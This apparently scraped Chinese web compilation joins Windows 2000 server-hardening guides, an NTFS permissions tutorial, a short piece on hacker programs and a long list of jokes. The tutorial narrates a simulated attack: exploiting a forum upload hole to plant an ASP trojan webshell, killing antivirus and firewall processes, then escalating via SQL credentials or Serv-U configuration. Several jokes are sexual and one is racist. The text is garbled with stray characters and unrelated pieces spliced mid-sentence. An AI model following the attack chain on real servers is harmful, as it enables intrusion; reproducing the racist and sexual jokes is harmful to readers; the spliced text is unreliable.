系统会自动重新登录。点本地连接,高级,安全月志,把月志的目录更改专门分配月志的目录,
不建议是C:再重新分配月志存储值的大小,我是设置了10000KB
八、第三方软件的帮助
防火墙:天网防火墙(建议)[二道贩子注:winxp以上可以考虑用系统自带的防火墙,win2000可以考虑用IPSEC,是个锻炼的机会)
杀毒软件:卡巴斯基
二道贩子后注:
现在黑客的攻击有从传统的系统漏洞转向了你的浏览器,所以要在升级一些传统漏洞补丁的同时要注意你的浏览器.
Windows 2000服务器的安全设置
设置禁用,构建第一道防线c_
在安装完Windows 2000后,首先要装上最新的系统补丁。但即使装上了,在因特网上的任何一台机器上只要输入“\\你的IP地址\c”,然后输入用户名 Guest,密码空,就能进入你的C盘,你还是完全暴露了。解决的方法是禁用•格斯特账号,为管理人设置一个安全的密码,将各驱动器的共享设为不共享。同时你还要关闭不需要的服务。你可以在管理工具的服务中将它们设置为禁用,但要提醒的是一定要慎重,有的服务是不能禁用的。一般可以禁用的服务有Telnet、任务调度程序(允许程序在指定时间运行)、遥远的登记服务(允许远程注册表操作)等。这是你构建的服务器的第一道防线。-设置第二,构建第二道防线*i
© 作为校园网的服务器,很多学校将该服务器同时作为网站服务器,而第二的漏洞也是一个棘手的问题。实际上,你可以通过简单的设置,完全可以将网站的漏洞补上。你可以将第二默认的服务都停止(如图 1,FTP服务你是不需要的,要的话笔者推荐用Serv-U;“管理网站点”和“默认网站点”都会给你带来麻烦;简单邮件传输协议一般也不用),然后再新建一个网站点h
©设置好常规内容后,在“属性→主目录”的配置中对应用程序映射进行设置,删除不需要的映射(如图 2),这些映射是第二受到攻击的直接原因。如果你需要CGI和PHP的话,可参阅一些资料进行设置LB
这样,配合常规设置,你的第二就可以安全运行了,你的服务器就有了第二道防线。#_t1)
运用扫描程序,堵住安全漏洞[J=
©要做到全面解决安全问题,你需要扫描程序的帮助。笔者推荐使用X浏览(如图 3),它可以帮助你检测服务器的安全问题。rmp
扫描完成后,你要看一下,是否存在口令漏洞,若有,则马上要修改口令设置;再看一下是否存在第二漏洞,若有,请检查第二的设置。其他漏洞一般很少存在,我要提醒大家的是注意开放的端口,你可以将扫描到的端口记录下来,以方便进行下一步设置。vY)
© 封锁端口,全面构建防线YD_\1
©《 黑客大多通过端口进行入侵,所以你的服务器只能开放你需要的端口,那么你需要哪些端口呢?以下是常用端口,你可根据需要取舍:7e|
80为网网站服务;21为FTP服务;25为电子邮件简单邮件传输协议服务;110为发邮件给POP3服务。?[U
© 其他还有SQL服务者的端口1433等,你可到网上查找相关资料。那些不用的端口一定要关闭!关闭这些端口,我们可以通过Windows 2000的安全策略进行。B
©《借助它的安全策略,完全可以阻止入侵者的攻击。你可以通过“管理工具→本地安全策略”进入,右击“IP安全策略”,选择“创建IP安全策略”,点[下一步]。输入安全策略的名称,点[下一步],一直到完成,你就创建了一个安全策略OkQcy
接着你要做的是右击“IP安全策略”,进入管理IP筛选器和筛选器操作,在管理IP筛选器列表中,你可以添加要封锁的端口,这里以关闭ICMP和 139端口为例说明。b]}
关闭了ICMP,黑客软件如果没有强制扫描功能就不能扫描到你的机器,也砰不到你的机器。关闭ICMP的具体操作如下:点[添加],然后在名称中输入“关闭ICMP”,点右边的[添加],再点[下一步]。在源地址中选“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点[下一步]。在协议中选择“ICMP”,点[下一步]。回到关闭ICMP属性窗口,即关闭了ICMP。sf7 FQ
下面我们再设置关闭 139,同样在管理IP筛选器列表中点“添加”,名称设置为“关闭 139”,点右边的“添加”,点[下一步]。在源地址中选择“任何IP地址”,点[下一步]。在目标地址中选择“我的IP地址”,点[下一步]。在协议中选择“TCP”,点[下一步]。在设置IP协议端口中选择从任意端口到此端口,在此端口中输入 139,点下一步。即完成关闭 139端口,其他的端口也同样设置,结果如图 5。f6WL
特别指出的是关闭UDP4000可以禁止校园网中的机器使用QQ。Q
©然后进入设置管理筛选器操作,点“添加”,点下一步,在名称中输入“拒绝”,点下一步。选择“阻止”,点[下一步]。u然后关闭该属性页,右击新建的IP安全策略“安全”,打开属性页。在规则中选择“添加”,点[下一步]。选择“此规则不指定隧道”,点下一步。在选择网络类型中选择“所有网络连接”,点下一步。在IP筛选器列表中选择“关闭ICMP”,点[下一步]。在筛选器操作中选择“拒绝”,点下一步。这样你就将“关闭ICMP”的筛选器加入到名为“安全”的IP安全策略中。同样的方法,你可以将“关闭 139”等其他筛选器加入进来。添加后的结果如图 7。(8
©《我 最后要做的是指派该策略,只有指派后,它才起作用。方法是右击“安全”,在菜单中选择“所有任务”,选择“指派”。IP安全设置到此结束,你可根据自己的情况,设置相应的策略。2
©《设置完成后,你可再用X浏览进行检查,发现问题再补上。9g
通过以上的设置,你的Windows 2000服务器可以说是非常安全了。希望你早日筑起服务器的安全防护林。
Windows下权限设置详解
随着动网论坛的广泛应用和动网上传漏洞的被发现以及SQL注入式攻击越来越多的被使用,WEBSHELL让防火墙形同虚设,一台即使打了所有微软补丁、只让80端口对外开放的WEB服务器也逃不过被黑的命运。难道我们真的无能为力了吗?其实,只要你弄明白了NTFS系统下的权限设置问题,我们可以对crackers们说:NO! 要打造一台安全的WEB服务器,那么这台服务器就一定要使用NTFS和Windows NT/2000/2003。众所周知,Windows是一个支持多用户、多任务的操作系统,这是权限设置的基础,一切权限设置都是基于用户和进程而言的,不同的用户在访问这台计算机时,将会有不同的权限。DOS是个单任务、单用户的操作系统。但是我们能说DOS没有权限吗?不能!当我们打开一台装有DOS操作系统的计算机的时候,我们就拥有了这个操作系统的管理员权限,而且,这个权限无处不在。所以,我们只能说DOS不支持权限的设置,不能说它没有权限。随着人们安全意识的提高,权限设置随着NTFS的发布诞生了。
Windows NT里,用户被分成许多组,组和组之间都有不同的权限,当然,一个组的用户和用户之间也可以有不同的权限。下面我们来谈谈NT中常见的用户组。 Administrators,管理员组,默认情况下,Administrators中的用户对计算机/域有不受限制的完全访问权。分配给该组的默认权限允许对整个系统进行完全控制。所以,只有受信任的人员才可成为该组的成员。
Power Users,高级用户组,Power Users 可以执行除了为 Administrators 组保留的任务外的其他任何操作系统任务。分配给 Power Users 组的默认权限允许 Power Users 组的成员修改整个计算机的设置。但Power Users 不具有将自己添加到 Administrators 组的权限。在权限设置中,这个组的权限是仅次于Administrators的。
Users:普通用户组,这个组的用户无法进行有意或无意的改动。因此,用户可以运行经过验证的应用程序,但不可以运行大多数旧版应用程序。Users 组是最安全的组,因为分配给该组的默认权限不允许成员修改操作系统的设置或用户资料。Users 组提供了一个最安全的程序运行环境。在经过 NTFS 格式化的卷上,默认安全设置旨在禁止该组的成员危及操作系统和已安装程序的完整性。用户不能修改系统注册表设置、操作系统文件或程序文件。Users 可以关闭工作站,但不能关闭服务器。Users 可以创建本地组,但只能修改自己创建的本地组。
Guests:来宾组,按默认值,来宾跟普通Users的成员有同等访问权,但来宾帐户的限制更多。
Everyone:顾名思义,所有的用户,这个计算机上的所有用户都属于这个组。
其实还有一个组也很常见,它拥有和Administrators一样、甚至比其还高的权限,但是这个组不允许任何用户的加入,在察看用户组的时候,它也不会被显示出来,它就是SYSTEM组。系统和系统级的服务正常运行所需要的权限都是靠它赋予的。由于该组只有这一个用户SYSTEM,也许把该组归为用户的行列更为贴切。
权限是有高低之分的,有高权限的用户可以对低权限的用户进行操作,但除了Administrators之外,其他组的用户不能访问 NTFS 卷上的其他用户资料,除非他们获得了这些用户的授权。而低权限的用户无法对高权限的用户进行任何操作。
我们平常使用计算机的过程当中不会感觉到有权限在阻挠你去做某件事情,这是因为我们在使用计算机的时候都用的是Administrators中的用户登陆的。这样有利也有弊,利当然是你能去做你想做的任何一件事情而不会遇到权限的限制。弊就是以 Administrators 组成员的身份运行计算机将使系统容易受到特洛伊木马、病毒及其他安全风险的威胁。访问 Internet 站点或打开电子邮件附件的简单行动都可能破坏系统。不熟悉的 Internet 站点或电子邮件附件可能有特洛伊木马代码,这些代码可以下载到系统并被执行。如果以本地计算机的管理员身份登录,特洛伊木马可能使用管理访问权重新格式化您的硬盘,造成不可估量的损失,所以在没有必要的情况下,最好不用Administrators中的用户登陆。Administrators中有一个在系统安装时就创建的默认用户----Administrator,Administrator 帐户具有对服务器的完全控制权限,并可以根据需要向用户指派用户权利和访问控制权限。因此强烈建议将此帐户设置为使用强密码。永远也不可以从 Administrators 组删除 Administrator 帐户,但可以重命名或禁用该帐户。由于大家都知道“管理员”存在于许多版本的 Windows 上,所以重命名或禁用此帐户将使恶意用户尝试并访问该帐户变得更为困难。对于一个好的服务器管理员来说,他们通常都会重命名或禁用此帐户。Guests用户组下,也有一个默认用户----Guest,但是在默认情况下,它是被禁用的。如果没有特别必要,无须启用此账户。我们可以通过“控制面板”--“管理工具”--“计算机管理”--“用户和用户组”来查看用户组及该组下的用户。
我们用鼠标右键单击一个NTFS卷或NTFS卷下的一个目录,选择“属性”--“安全”就可以对一个卷,或者一个卷下面的目录进行权限设置,此时我们会看到以下七种权限:完全控制、修改、读取和运行、列出文件夹目录、读取、写入、和特别的权限。“完全控制”就是对此卷或目录拥有不受限制的完全访问。地位就像Administrators在所有组中的地位一样。选中了“完全控制”,下面的五项属性将被自动被选中。“修改”则像Power users,选中了“修改”,下面的四项属性将被自动被选中。下面的任何一项没有被选中时,“修改”条件将不再成立。“读取和运行”就是允许读取和运行在这个卷或目录下的任何文件,“列出文件夹目录”和“读取”是“读取和运行”的必要条件。“列出文件夹目录”是指只能浏览该卷或目录下的子目录,不能读取,也不能运行。“读取”是能够读取该卷或目录下的数据。“写入”就是能往该卷或目录下写入数据。而“特别”则是对以上的六种权限进行了细分。读者可以自行对“特别”进行更深的研究,鄙人在此就不过多赘述了。
下面我们对一台刚刚安装好操作系统和服务软件的WEB服务器系统和其权限进行全面的刨析。服务器采用Windows 2000 Server版,安装好了SP4及各种补丁。WEB服务软件则是用了Windows 2000自带的IIS 5.0,删除了一切不必要的映射。整个硬盘分为四个NTFS卷,C盘为系统卷,只安装了系统和驱动程序;D盘为软件卷,该服务器上所有安装的软件都在D盘中;E盘是WEB程序卷,网站程序都在该卷下的WWW目录中;F盘是网站数据卷,网站系统调用的所有数据都存放在该卷的WWWDATABASE目录下。这样的分类还算是比较符合一台安全服务器的标准了。希望各个新手管理员能合理给你的服务器数据进行分类,这样不光是查找起来方便,更重要的是这样大大的增强了服务器的安全性,因为我们可以根据需要给每个卷或者每个目录都设置不同的权限,一旦发生了网络安全事故,也可以把损失降到最低。当然,也可以把网站的数据分布在不同的服务器上,使之成为一个服务器群,每个服务器都拥有不同的用户名和密码并提供不同的服务,这样做的安全性更高。不过愿意这样做的人都有一个特点----有钱:)。好了,言归正传,该服务器的数据库为MS-SQL,MS-SQL的服务软件SQL2000安装在d:\ms-sqlserver2K目录下,给SA账户设置好了足够强度的密码,安装好了SP3补丁。为了方便网页制作员对网页进行管理,该网站还开通了FTP服务,FTP服务软件使用的是SERV-U 5.1.0.0,安装在d:\ftpservice\serv-u目录下。杀毒软件和防火墙用的分别是Norton Antivirus和BlackICE,路径分别为d:\nortonAV和d:\firewall\blackice,病毒库已经升级到最新,防火墙规则库定义只有80端口和21端口对外开放。网站的内容是采用动网7.0的论坛,网站程序在e:\www\bbs下。细心的读者可能已经注意到了,安装这些服务软件的路径我都没有采用默认的路径或者是仅仅更改盘符的默认路径,这也是安全上的需要,因为一个黑客如果通过某些途径进入了你的服务器,但并没有获得管理员权限,他首先做的事情将是查看你开放了哪些服务以及安装了哪些软件,因为他需要通过这些来提升他的权限。一个难以猜解的路径加上好的权限设置将把他阻挡在外。相信经过这样配置的WEB服务器已经足够抵挡大部分学艺不精的黑客了。读者可能又会问了:“这根本没用到权限设置嘛!我把其他都安全工作都做好了,权限设置还有必要吗?”当然有!智者千虑还必有一失呢,就算你现在已经把系统安全做的完美无缺,你也要知道新的安全漏洞总是在被不断的发现。权限将是你的最后一道防线!那我们现在就来对这台没有经过任何权限设置,全部采用Windows默认权限的服务器进行一次模拟攻击,看看其是否真的固若金汤。
假设服务器外网域名为http://www.webserver.com,用扫描软件对其进行扫描后发现开放WWW和FTP服务,并发现其服务软件使用的是IIS 5.0和Serv-u 5.1,用一些针对他们的溢出工具后发现无效,遂放弃直接远程溢出的想法。打开网站页面,发现使用的是动网的论坛系统,于是在其域名后面加个/upfile.asp,发现有文件上传漏洞,便抓包,把修改过的ASP木马用NC提交,提示上传成功,成功得到WEBSHELL,打开刚刚上传的ASP木马,发现有MS-SQL、Norton Antivirus和BlackICE在运行,判断是防火墙上做了限制,把SQL服务端口屏蔽了。通过ASP木马查看到了Norton Antivirus和BlackICE的PID,又通过ASP木马上传了一个能杀掉进程的文件,运行后杀掉了Norton Antivirus和BlackICE。再扫描,发现1433端口开放了,到此,便有很多种途径获得管理员权限了,可以查看网站目录下的conn.asp得到SQL的用户名密码,再登陆进SQL执行添加用户,提管理员权限。也可以抓SERV-U下的ServUDaemon.ini修改后上传,得到系统管理员权限。还可以传本地溢出SERV-U的工具直接添加用户到Administrators等等。大家可以看到,一旦黑客找到了切入点,在没有权限限制的情况下,黑客将一帆风顺的取得管理员权限。
那我们现在就来看看Windows 2000的默认权限设置到底是怎样的。对于各个卷的根目录,默认给了Everyone组完全控制权。这意味着任何进入电脑的用户将不受限制的在这些根目录中为所欲为。系统卷下有三个目录比较特殊,系统默认给了他们有限制的权限,这三个目录是Documents and settings、Program files和Winnt。对于Documents and settings,默认的权限是这样分配的:Administrators拥有完全控制权;Everyone拥有读运,列和读权限;Power users拥有读运,列和读权限;SYSTEM同Administrators;Users拥有读运,列和读权限。对于Program files,Administrators拥有完全控制权;Creator owner拥有特殊权限;Power users有完全控制权;SYSTEM同Admin
什么是黑客程序?
所谓黑客程序,是指一种无传染性的系统安全屏蔽程序。它被植入计算机系统,一旦黑客程序感染了计算机,便与黑客里应外合,使黑客攻击变得十分容易。
现在的黑客程序很可怕,就好像在你的计算机上隐藏了一套摄录装置。它可能窃取你的存折和信用卡的账号密码,偷看你的日记、情书,有时候,它甚至能够在你的计算机上留下暗门,随后供黑客出入,把你的计算机完全地控制起来。
设想一下,如果黑客通过一台计算机和一条电话线进入国家重要的政治、经济、军事、金融、保险网络系统,并进行控制或破坏,社会会怎么样?
黑客软件就是这样的一种工具,它可以使得那些略懂一些软件的人成为黑客,因为,一切都是现成的了,只需要学一学怎么用就可以了。借助黑客软件,十几岁的孩子都能成为黑客,就像操作自己的计算机一样轻而易举,通过互联网进入并远程控制被黑客程序“感染”过的计算机,这实在是一件很可怕的事情。
因此,专家认为,黑客软件不是病毒,但危害性要比病毒严重得多。
有一个黑客群体发布了一个人侵Windows机器的程序“后门”。它可以让用户经由因特网进入并控制远程Windows计算机。实际上,现在网络上到处都有这样的自由软件下载,这简直和到处都是枪支店一样危险。
所有运行在Windows95/98操作平台之上、使用支持TCP/IP通讯协议进行联网的计算机系统,都有可能遭受黑客程序“后门”的攻击。实际上这几乎包括了几乎所有的网络用户,可以把通过电话线拨号上网钓用户一网打尽。
专家告诉我们,目前已发现黑客程序的种类很多。黑客程序只要进行一次欺骗性的运行就可以完成自动安装,而且永远起作用,其破坏无规律可循,无法预见。
黑客程序的传播途径也五花八门,例如电子邮件的附件、共享软件程序、聊天软件、盗版光盘上不明用途的软件、电子贺卡寄送的可执行的“礼物”程序。这就告诉我们,随便安装程序是一件很危险的事情,尤其是重要部门的计算机系统。
急求笑话(一次至少十个)
你好意思不给分吗?
1.一只公鹿,它走着走着,越走越快,最后它变成了高速公路(鹿)!!!!
2.两只番茄过马路,一辆汽车飞驰而过,其中一只闪避不及被压扁,另一个番茄指着被压扁的番茄大笑道:挖哈哈哈,番茄酱…
3.大灰狼说:“我要吃了你!!!” 你们猜,怎么了?
结果大灰狼就把小羊吃了.
4.石头和年糕打架,石头飞起一脚就把年糕踢进了大海…………
从前有一对恋人私定终生,但是男生需要服兵役,便和女生定下誓言,给了女生一枚钻石戒,并许诺在三年后的今天与那女生碰面,到时候,那枚戒指作为婚戒. 好不容易3年过去了,女生一直在等男生,却一直等不到,她伤心过度,绝望的她把钻戒扔入大海,远走他乡.可是,那男生其实也一直在等那女孩,可是,女孩误解了约会地点,于是便永远的成为了遗憾.男生伤心欲绝…过了几年,男生出外钓鱼,猜猜看他钓到了什么?
年糕!!!
5.水饺是男生还是女生
答案 男生 因为水饺有包皮
6.有只鸭子叫小黄,一天他被车撞到,他就大叫一声:「呱!」从此他就变成小黄瓜了!!
7.火柴棍突然觉得头很痒,就伸手挠,挠着挠着就把自己烧死了…
8. 从前从前有一只鸟
他每天都会经过一片玉米田
但是很不幸的
有一天那片玉米田发生了火灾
所有的玉米都变成了爆米花
小鸟飞过去以后……
以为下雪,就冷死了…
9.台湾什么时候会想要统一?
买方便面的时候
10. 阿松和阿柏无事闲聊互道岁月不饶人。
阿松:“回忆儿童时代,过的最快乐的是儿童节。”
阿柏:“过了十年就是青年节。”
阿松:“再过十年就是父亲节。”
阿柏:“再过几十年就是老人节了。”
阿松:“又再过几十年.”
阿柏:“清明节。”
11. 众士兵:“渴……渴……”
曹操:“大家再坚持一会!我曾经到过这个地方,记得附近有一座梅林,再走一会可能就到了”
众士兵:“噢 ̄ ̄ ̄ ̄有梅子吃呀 ̄ ̄ ̄噢 ̄ ̄ ̄”
半个时辰后——曹仁:“主公!探险队找到了大量的水源!”
曹操:“哈哈哈哈,大家听到了吗?终于有水喝啦”
众士兵:“不去……一定要找到梅子……”12.一个女孩失恋了,我劝她:“两条腿的蛤蟆不好找,三条腿的男人有的是啊!”
13.有一天小强问他爸爸:“爸爸,我是不是傻孩子啊?”爸爸说:“傻孩子,你怎么会是傻孩子呢?”
14.一块三分熟的牛排和一块5分熟的牛排在大街上遇到了,为什么他们没打招呼呢??(假设他们会说话)
因为………………..
因为……………………
因为他们都不熟啊~~~~~~~~
15. 提问:怎样使麻雀安静下来?
回答:压它一下。
原因:鸦雀无声(压雀无声)。
16. 一大学生不幸被敌人抓住,敌人把他绑在了电线杆上,然后问他:“说,你是哪里的?不说就电死你!!!”这个大学生回了敌人一句话,结果被电死了……
他说:“我是电大的!”
17. 甲:“我带你去一个全部女生都没有穿胸罩的地方。”
乙:“真的吗?在哪里?快带我去!”
甲:“就在隔壁的幼儿园!”
18.开心词典节目主持人王小丫现场采访一位节目观众,问:“在你心目中你最崇拜哪个女主持人?”观众说:“是你呀。”王小丫问:“为何如此说?”观众说:“因为你长得有点像杨澜!”
19.知道蜘蛛人是什麽颜色的吗?
红色,错!
是白色的啦
不信你念念蜘蛛人的英文: spider man(是白的人)
20.为什麼小明会摔倒?
请三思…………………………..
因为地板滑嘛
21.一群动物开完PARTY后,冲进7-11便利商店买东西,因为太吵,结果都被店员打了出来,却独留小羊在店裏面,请问是为什麽?
便利商店24小时不打烊啊 ………
22.玻璃杯和咖啡杯一起过马路,忽然有人大喊:车子来啦!
结果玻璃杯被车子撞到了,咖啡杯却没事,请问为什麽?
咖啡杯有耳朵啊!
23.一只马说,我公司隆重推出新产品,马屁3号,简称MP3…
24.我最讨厌两种人:
一是有种族歧视的;
二是黑人;
三是不识数的!
25.我要感谢小泽圆、朝河兰、长濑爱、美竹凉子、高树玛莉亚、川本舞、忧木瞳、夏木美夕、芹尺直美、白石、工藤葵、小山内真由、岸川美穗、西田友纪、泽井牙衣、藤崎彩花、叶山みづき、井上千寻,松村、yuki和泉静香等等这些我知道名字和不知道名字的、曾经出现在我电脑中现在已经被删除或者仍然在电脑中的异国友人:每每夜深人静的时候,是她们陪我渡过了一个又一个孤单的夜晚;在我精神最不济的时候,是她们适时地来安慰我;当我玩CS精疲力尽时,是她们让我体会到通畅的快感;在我状态低迷没有手感时,是她们让我精神为之HIGH起来~
26.现在地震预测精度确实提高了不少,这次只差两个字:预测在“黑龙江”,结果却在“九江”!
27.张靓颖说:“崇拜我的歌迷都说——偶的偶像叫颖”
何洁说:“崇拜我的歌迷都说——偶的偶像叫洁”
周笔畅说:“崇拜我的歌迷都说——偶的偶像叫畅”
李宇春说:“你们聊,我先走了!”
28..五个福娃聚在一起聊天。
贝贝提议:我们给自己起个小名吧,我就叫“贝娃”!
晶晶:那我就叫“晶娃”!
欢欢:我叫“欢娃”好了!
妮妮:我叫“妮娃”好了!
迎迎噌地站起来说:你们聊,我有点事,先走了……
话说2058年,五个福娃又聚在一起聊天。
贝贝:我们再说说自己的外号吧,人们都很尊敬我,叫我“贝爷”!
欢欢:人们都叫我“欢爷”!
妮妮:人们都叫我“妮爷”!
迎迎:人们都叫我“迎爷”!
京京噌地站起来说:你们聊,我有点事,先走了……
29.严冬到了,偶决定保持洗冷水澡的习惯,可是洗着洗着,偶发现自己竟然变回了童年的样子!!!
30.芹菜走着走着,突然觉得肚子很痛,接着他”卟”的一声,你说他拉出什么来了~~??那就是芹粪(勤奋)咯!!!芹(菜)粪 是什么颜色的??????
答案:黄色
因为 : 秦始皇 (芹屎黄)
31.有一个胖子….
从二十楼顶往下跳….
结果变成了…..
死胖子!!
1:男女朋友睡一个房间,女的画了条线说:“过线的是禽兽。”醒来发现男的真的没过线,女的狠狠的打了男的一巴掌:“你连禽兽都不如。”
次日 男女有同睡一房女的照旧画了条线警告,男的有了上次的教训深夜打算过线,结果因为紧张而未果。天亮后,女的有打男的一巴掌说:“没想到你不如禽兽。”
2:在医院里,一家喜得贵子,孩子刚生下来就回说话,孩子说:“爷爷。”爷爷啊的一声就死了。孩子又说:“奶奶。”奶奶啊的一声死了。孩子又说:“爸爸。”他爸爸啊的一声,一看自己没死,这个时候,孩子的老叔啊的一声死了。
3:袋鼠和青蛙去嫖鸡,袋鼠三下两下完事,只听隔壁的青蛙整夜一二三嘿!一二三嘿!袋鼠好羡慕,次日,袋鼠说:“哇!~~蛙兄,你好棒哦!。”青蛙说:“操,老子一夜都没跳上床!~~”
4:我那天在超市看见一个看帖不回帖的人,他悄悄D把手放在条码扫描器上,只见屏幕显示:猪蹄 8元,他以为机器坏了,把脸凑过去,结果屏幕上显示:猪头肉 5元
5:一只大象问骆驼:‘你的咪咪怎么Zhang在背上?’骆驼说:‘死远点,我不和鸡鸡Zhang在脸上的东西讲话!
6:幼儿园女教师领学生游泳,不慎露出一根X毛,一学生问:老师,那是什么啊?女教师一狠心将其拔掉,说:线头!
7:小女孩总是向小男孩炫耀自己的新玩具.小男孩没办法,只好脱掉裤子说:这个你永远没有!女孩也脱掉裤子说:我妈说只要有这个,你那玩意儿要多少有多少!
8:一排妓女在街边等客,一位八旬老妇见到了,好奇的问:你们在等什么?妓女没好气的说:等棒棒糖!老妇也就排队加入队伍等糖,结果被条子抓,条子问老妇:你牙都没了也能干?老妇笑着曰:我可以舔的!!!
9:司机送领导参加文艺晚会,领导进了会场,司机被保安拦住,司机说:我跟领导是一个系统的,保安说:鸡X跟蛋也是一个系统的,鸡X进去了,蛋能进去吗?
10:一日,某君的老婆生小孩,他急急忙忙跑到医院看望,等了n个小时,产房里传来了哭声,他高兴大喊,我做爸爸了!这时医生满脸愁容走出来,告诉他,小孩子先天畸形。某君呆在那,还没明白什么原因,忽然产房里传来了他老婆的喊叫:都怪那天杀的,看贴老不回贴,报应呀 99%的人看完后当场含笑而死.....如果你没有倒地那你就是
老妈:“这个‘I don’t know.’是什么意思?”
我说:“我不知道。”
老妈:“送你上学上了几年,你怎么什么都不知道!”
我说:“不是!就是‘我不知道’嘛!!”
老妈:“还嘴硬!!!你再给我说说这个,‘I know’是什么意思你该知道吧?”
我说:“我知道。”
老妈:“知道就快说。”
我说:“就是我知道。”
老妈:“找茬呀你?”
我说:“没错呀,我知道。”
老妈:“知道你还不说!不懂不要装懂!你给我小心点,花那么多钱送你上学,搞得现在什么都不会,会那么一丁点儿东西还跟老妈摆谱儿。再问你最后一个,你给我好好解释一下,说不出来我再收拾你。你给我翻译一下‘I know but I don’t want to tell you.’是什么意思?”
我晕倒,拿起枕头往头上爆砸三十几下,用头撞墙四十多下,双手轮番抽自己嘴巴五十多下,用腿踢桌子角六十多下,我问老妈:“这下你满意了吧?”
人们常说:学习是痛苦的历程,不过我不明白,为什么受伤的总是我。
我妈学英语的热情日益高涨,因而我的苦难就日益加深。每当老妈问我英语的时候,我都会先吃上几片阿斯匹林,缠好绷带,再运上龟背神功至第十二重。
这不他老人家又来问我了:“儿啊,‘I’m very annoyed,don’t trouble me’是什么意思啊?
我说:“我很烦,别烦我。”
老妈:“找打,跟你妈这么说话。”
老妈又问:“‘I hear nothing,repeat.’是what意思啊?”
我说:“我没听清,再说一次。”
老妈又说了一遍:“I hear nothing,repeat.”
“我没听清,再说一次。”(结果被扁)
老妈再问:“‘Look up in the dictionary’是何意呀?”
我说:“查字典。”
“查字典我还问你做甚?”(被扁)
老妈又问:“‘You had better ask others’怎么翻呢?”
我说:“你最好去问别人。”
“你是我儿子,我问别人干吗,又找打。”
“啊!God save me!”
“耍你老妈玩,上帝也救不了你!”(被扁)
“我再问你,‘Use your head,then think it over’又是什么意思啊?”
我说:“动动脑子,再仔细想想。”
“臭小子,还敢耍我。”接着又要动手。
我忙说:“是世上只有妈妈好的意思。”
“恩。这还差不多。一会儿我给你做好吃的,明天再问你。” 我晕~
43.老师:老实说,你吸烟吗?
男生 a :不吸。
老师:不吸?嗯,吃根薯条吧。
男生 a 很自然地伸出两根手指夹着接过来……
老师:不吸?!叫家长来……
[ 场景二 ]
老师 : 吸烟吗?
男生 b: 不吸。
老师:不吸?嗯,吃根薯条吧。
b 由于听到a 的情况,所以很小心的用手掌接过了薯条。
老师:不蘸点番茄酱吗?
b 一不小心蘸多了,于是马上用手指弹了弹……
老师:弹烟灰的姿势很熟练嘛。叫家长来……
[ 场景三 ]
老师:吸烟吗?
男生 c: 不吸。
老师:不吸,好,吃根薯条吧。
c 因有前面两个例子很小心地流着汗吃完了薯条。
老师:不给同学带根回去吗?
c 接过薯条后顺手就夹在耳朵上……
老师:不吸???叫家长来……
[ 场景四 ]
老师:吸烟吗?
男生 d :不吸。
老师:很好,吃根薯条吧。
d 心惊胆战地吃完了薯条。
老师:不给同学带根回去吗?
d 又小心地将薯条放到了上衣袋里。
老师突然大喊一声:校长来了!
d 赶忙从口袋里取出薯条扔在地上,用脚使劲地踩……
老师:不吸?!叫家长来……
[ 场景五 ]
老师:吸烟吗?
男生 e :不吸,
老师:很好,吃根薯条吧。
e 刚拿过薯条,老师说:不请我吃吗?
e 赶忙双手递过薯条,然后掏出打火机……
老师:不吸?!叫家长来……
[ 场景六 ]
老师:吸烟吗?
男生 f :不吸。
老师:很好,吃根薯条吧。
f 心惊胆战地吃完了。
老师:突然大喊一声:校长来了!
f 手心冒汗,但仍镇定地低头说到:校长您好!
老师:校长会闻到你嘴里的味道的。
f 掏出薯条:不会,还在这呢,火都还没点……
[ 场景七 ]
老师:你到底吸不吸烟?
男生 g :向上帝保证,绝对不吸。
老师:真的不吸?好,来吃根薯条吧。
g 非常自然接过薯条吃个干净。
老师:真是个好孩子,你一般喜欢什么牌子的薯条呢?
g( 得意忘形地) :大中华……
[ 场景八 ]
老师:吃根薯条吧。
男生 n :谢谢,不会。
老师:……
44.唐僧的家书:
亲爱的悟空,我这封信写得很慢,因为知道你看字不快。我们已经搬家了,不过地址没改,因为搬家的时候把门牌带来了。
这个礼拜下了两次雨,第一次下了3天,第二次下了4天。昨天我们去买比萨,店员问我要切成8块还是12块,我说8块就成了,12块吃不完。我给你寄去的外套,怕邮寄时超重,把扣子剪下来放口袋里了。
嫦娥生了,因为不知道是男是女,所以不知道你是该当舅舅还是阿姨。最后告诉你,本来想给你寄钱,可是信封已经封上了。
五一节快到了,别忘了给孩子们讲讲很久很久以前的事:
那时候天是蓝的,水也是绿的,庄稼是长在地里的,猪肉是可以放心吃的,耗子还是怕猫的,法庭是讲理的,结婚是先谈恋爱的,理发店是只管理发的,药是可以治病的,医生是救死扶伤的,拍电影是不需要陪导演睡觉的,照相是要穿衣服的,欠钱是要还的,孩子的爸爸是明确的,学校是不图挣钱的,白痴是不能当教授的,卖狗肉是不能挂羊头的,结婚了是不能泡MM的,买东西是要付钱的,看完不笑是要被打PP的。
45.为了测试美国,香港,中国大陆三地警察的实力,联合国将三只兔子放在三个森林中,看三地警察谁先找出兔子。第一个森林前是美国警察,他们先花整整半天时间开会制定作战计划,严格分工,然后派特种部队快速进入森林进行地毯式搜索,结果开会耽搁了时间,兔子跑了,任务失败! ! ! ! 然后轮到香港警察,他们派了一百多号人和几十辆警车在身临其境外一字排开,由带头人用喇叭喊话:“兔子,兔子,你已被包围了,快出来投降……”半天过去了,没动静。飞虎队进入森林,搜索一遍,没结果,任务失败! ! ! ! 最后是中国警察,只有四个,先打了一天麻将,黄昏时一人拿一警棍进入森林,没五分钟,听到森林里传来一阵动物的惨叫,中国警察一人抽着一根烟有说有笑的出来,后面拖着一只鼻青脸肿的熊,熊奄奄一息的说到:“不要再打了,我就是兔子……”
46.国家 主席:李世民
军委 主席:成吉思汗
军委副主席:毛泽东
人大委员长:孙中山
国务院总理:诸葛亮
外交 部长:周恩来
外交部发言人:宋美龄
国防 部长:曹操
教育 部长:孔子
卫生 部长:华佗
环保总局局长:老子
农业 部长:贾思勰
水利 部长:大禹
建设 部长:秦始皇
地质 部长:张衡
公安 部长:展昭
国土资源部长:徐霞客
发展与改革委员会主任:商鞅
最高人民法院院长:包拯
国家禁 毒署署长:林则徐
妇联 主任:武则天
新闻出版署署长:纪晓岚
后勤 部长:李连英
中东特使:张骞
台湾事务办公厅:郑成功
海关总署:郑和
文化部长:唐伯虎
拆迁办主任:孟姜女
计生委主任:唐僧
医务 处长:李时珍
航空航天部部长:嫦娥
国家跳水队队长:屈原
